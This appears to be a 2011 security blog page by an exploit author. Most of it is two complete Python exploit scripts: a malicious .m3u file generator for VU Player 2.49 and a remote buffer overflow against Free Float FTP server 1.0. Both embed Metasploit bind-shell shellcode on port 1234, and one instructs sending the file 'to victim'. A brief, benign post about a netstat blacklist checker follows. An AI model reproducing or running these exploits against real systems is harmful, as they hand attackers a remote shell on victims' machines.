Wednesday, September 28, 2011

VU Player stack buffer overflow Local Exploit

This is VU player stack buffer overflow exploit.This is a local exploit.
When you run this exploit a malformes .m3u file will be generated.
Change the shell code accroding to your purpose.
The shell code i have added is bad character free windows_shell_bind_tcp generated from metasploit frmae work.
If you use this shell code,After victim open the malformed m3u,you just have to telnet thr victim on port 1234 to get shell.

I have submitted the code @ injector vulnerability database
you can also find it @ http://1337day.com/exploits/16741
# Exploit Title: VU Player stack buffer overflow Local Exploit
# Version: 2.49
# Date: 22-08-2011
# Author: Debasish Mandal   http://www.facebook.com/raza.whitehat
# Email debasishm89@gmail.com
# Software Link: http://www.brothersoft.com/vuplayer-62979.html
# Category:: Local
# Tested on: Windows XP SP2.


#!/usr/bin/python
from struct import pack
print "######################################################"
print "##   VU Player Local BO Exploit                     ##"
print "##   http://www.brothersoft.com/vuplayer-62979.html ##"
print "##   Author :: Debasish Mandal                      ##"
print "##   Email : debasishm89@gmail.com                  ##"
print "##   http://www.facebook.com/raza.whitehat          ##"
print "######################################################"
raw_input("Press Enter to generate the crafted m3u...")
f = open('victim.m3u','w')
junk = "A"*1012
eip = pack('<L',0x77D7754A)  # JMP ESP @ USER32.dll
nop = "\x90" *10    # NOPs [To make the exploit smooth]

#Shell Code Starts Here
#List bad characters \x00  \x09   \x0a  \x1a
#Generated form Metasploit Framework
#Name : windows/shell/bind_tcp
#LPORT = 1234
shellcode = ("\xda\xc2\xd9\x74\x24\xf4\xbf\x97\xf8\x9b\xb0\x58\x29\xc9\xb1"
"\x4b\x31\x78\x19\x83\xe8\xfc\x03\x78\x15\x75\x0d\x67\x58\xf0"
"\xee\x98\x99\x62\x66\x7d\xa8\xb0\x1c\xf5\x99\x04\x56\x5b\x12"
"\xef\x3a\x48\xa1\x9d\x92\x7f\x02\x2b\xc5\x4e\x93\x9a\xc9\x1d"
"\x57\xbd\xb5\x5f\x84\x1d\x87\xaf\xd9\x5c\xc0\xd2\x12\x0c\x99"
"\x99\x81\xa0\xae\xdc\x19\xc1\x60\x6b\x21\xb9\x05\xac\xd6\x73"
"\x07\xfd\x47\x08\x4f\xe5\xec\x56\x70\x14\x20\x85\x4c\x5f\x4d"
"\x7d\x26\x5e\x87\x4c\xc7\x50\xe7\x02\xf6\x5c\xea\x5b\x3e\x5a"
"\x15\x2e\x34\x98\xa8\x28\x8f\xe2\x76\xbd\x12\x44\xfc\x65\xf7"
"\x74\xd1\xf3\x7c\x7a\x9e\x70\xda\x9f\x21\x55\x50\x9b\xaa\x58"
"\xb7\x2d\xe8\x7e\x13\x75\xaa\x1f\x02\xd3\x1d\x20\x54\xbb\xc2"
"\x84\x1e\x2e\x16\xbe\x7c\x27\xdb\x8c\x7e\xb7\x73\x87\x0d\x85"
"\xdc\x33\x9a\xa5\x95\x9d\x5d\xc9\x8f\x59\xf1\x34\x30\x99\xdb"
"\xf2\x64\xc9\x73\xd2\x04\x82\x83\xdb\xd0\x04\xd4\x73\x8b\xe4"
"\x84\x33\x7b\x8c\xce\xbb\xa4\xac\xf0\x11\xcd\x1d\xd4\xc9\x9a"
"\x5f\xea\xfc\x06\xd6\x0c\x94\xa6\xbe\x87\x01\x05\xe5\x1f\xb5"
"\x76\xcc\x33\x6e\xe1\x59\x5a\xa8\x0e\x5a\x48\x9a\xa3\xf3\x1b"
"\x69\xa8\xc0\x3a\x6e\xe5\x61\x2a\xf9\x73\xe3\x19\x9b\x84\x2e"
"\xcb\x5b\x11\xd4\x5a\x0b\x8d\xd6\xbb\x7b\x12\x29\xee\xf7\x9b"
"\xbf\x51\x60\xe4\x2f\x52\x70\xb2\x25\x52\x18\x62\x1d\x01\x3d"
"\x6d\x88\x35\xee\xf8\x32\x6c\x42\xaa\x5a\x92\xbd\x9c\xc5\x6d"
"\xe8\x1c\x3a\xb8\xd5\x9a\x4a\xce\x35\x67")
payload = (junk+eip+nop+shellcode)
print "[*]Writinng payload to the file victim.m3u"
f.write(payload)
f.close()
print "[*]Crafted .m3u File generated"
print "[*]Now send the file to victim"
print "[*]Telnet to the victim on port 1234 after execution of this crafted m3u"
print "[*]Exit"


# 1337day.com [2011-08-22

Free Float Ftp server stack buffer overflow

First of all i fired Metasploit Fuzzer aginst this FTP server.The fuzzer worked like butter.
Near 250 bytes of Junk the program crashed and checked the yahoooooo....the offset was overwritten with metasploit pattern.
I started writing the exploit.Like always python is my best choice for writing exploits.So the exploit code is in python.
The shell code added with the exploit is windows_shell_bind_tcp.it spawns a bindshell on port 1234.
generated form Metasplot frmaework.
The bad characters are removed form the shell code using metasplot encoder.

I have published this exploit @ packet sortm security and Injector


You can find the exploit code @

http://packetstormsecurity.org/files/author/9123/


http://1337day.com/exploits/16737
# Exploit Title: Free Float FTP server Response stack Buffer Overflow Exploit
# Date: 21-08-2011
# Author: Debasish Mandal   http://www.facebook.com/raza.whitehat
# Software Link: http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php
# Version: 1.0
# Category:: Remote
# Tested on: Windows XP SP2.


#!/usr/bin/python

import  socket,sys
from struct import pack

buff = "A"* 251 
junk = "A"*5
nop = "\x90"*20
eip = pack('<L',0x77F5801C)

#Shell code generated by Metasploit frmaework.
#Shell Code :: windows/shell/bind_tcp.
#Local PORT :: 1234.
#Neglected BAD CHARACTERS  are "\x00","\x0a" &\x0d".
shellcode = ("\xbd\xe6\x09\xc6\x4f\xd9\xc4\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x4b\x83\xc2\x04\x31\x6a\x10\x03\x6a\x10\x04\xfc\x3a\xa7\x41"
"\xff\xc2\x38\x31\x89\x26\x09\x63\xed\x23\x38\xb3\x65\x61\xb1"
"\x38\x2b\x92\x42\x4c\xe4\x95\xe3\xfa\xd2\x98\xf4\xcb\xda\x77"
"\x36\x4a\xa7\x85\x6b\xac\x96\x45\x7e\xad\xdf\xb8\x71\xff\x88"
"\xb7\x20\xef\xbd\x8a\xf8\x0e\x12\x81\x41\x68\x17\x56\x35\xc2"
"\x16\x87\xe6\x59\x50\x3f\x8c\x05\x41\x3e\x41\x56\xbd\x09\xee"
"\xac\x35\x88\x26\xfd\xb6\xba\x06\x51\x89\x72\x8b\xa8\xcd\xb5"
"\x74\xdf\x25\xc6\x09\xe7\xfd\xb4\xd5\x62\xe0\x1f\x9d\xd4\xc0"
"\x9e\x72\x82\x83\xad\x3f\xc1\xcc\xb1\xbe\x06\x67\xcd\x4b\xa9"
"\xa8\x47\x0f\x8d\x6c\x03\xcb\xac\x35\xe9\xba\xd1\x26\x55\x62"
"\x77\x2c\x74\x77\x01\x6f\x11\xb4\x3f\x90\xe1\xd2\x48\xe3\xd3"
"\x7d\xe2\x6b\x58\xf5\x2c\x6b\x9f\x2c\x88\xe3\x5e\xcf\xe8\x2a"
"\xa5\x9b\xb8\x44\x0c\xa4\x53\x95\xb1\x71\xf3\xc5\x1d\x2a\xb3"
"\xb5\xdd\x9a\x5b\xdc\xd1\xc5\x7b\xdf\x3b\x6e\x4a\xfb\x97\xf9"
"\xae\xfb\x13\x28\x27\x1d\x71\xdc\x61\xb5\xee\x1e\x56\x0e\x88"
"\x61\xbd\x22\x01\xf6\x8a\x2c\x95\xf9\x0b\x7b\xb5\x56\xa4\xec"
"\x4e\xb5\x71\x0c\x51\x90\xd2\x59\xc6\x6e\xb2\x28\x76\x6e\x9f"
"\xd9\x78\xfa\x1b\x48\x2e\x92\x21\xad\x18\x3d\xda\x98\x12\xf4"
"\x4e\x63\x4d\xf9\x9e\x63\x8d\xaf\xf4\x63\xe5\x17\xac\x37\x10"
"\x58\x79\x24\x89\xcd\x81\x1d\x7d\x45\xe9\xa3\x58\xa1\xb6\x5c"
"\x8f\x33\x8b\x8a\xf6\xb1\xfd\xb8\x1a\x7a")

buff += eip
buff += nop
buff += shellcode
buff += junk
HOST = raw_input("Enter the target host : ")
PORT = raw_input("Enter the targer port (Default 21): ")
print "[*] Connecting to the host "+HOST+" on port "+PORT 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((HOST, int(PORT)))
print "[*]Connected to target FTP Server!"
except:
print "[*] FTP Server didn't respond\n"
sys.exit(0)
data=s.recv(1024)
print "[*]Sending PAYLOAD to the target server"
s.send(buff+'\r\n')
print "[*]Exploit Completed..."
print "[*]Now telnet to the server on port 1234"


# 1337day.com [2011-08-21]

Thursday, September 15, 2011

infIP v 0.1 Blacklist Checker

infIP is a little python script coded by me that checks output from netstat against RBLs from Spamhaus.

This script can be used to check if your PC is infected or Not

This tool can be downloaded from

http://packetstormsecurity.org/files/104927/infIP-0.1-Blacklist-Checker.html

This package contains
1] infIP.py [ This is the main python script.]
2] BeautifulSoup.py [Beautiful Soup is a Python HTML/XML parser designed for quick turnaround projects like screen-scraping]
BeautifulSoup Also available @ http://www.crummy.com/software/BeautifulSoup/
This script is tested with Python 2.7.
Instructions:-

1] Download Python from http://www.python.org/ftp/python/2.7/python-2.7.msi
2] Install python2.7. [Installation Directory by Default C:\Python27].
3] Copy the "BeautifulSoup.py" file into "C:\Python27\Lib" directory.
4] Execute "infIP.py"
5] Let the script complete initial lookup process after completions it will open an html report in your default browser with all the hosts and their details. Click on the hosts to go to details.

The demo of this script can be found here :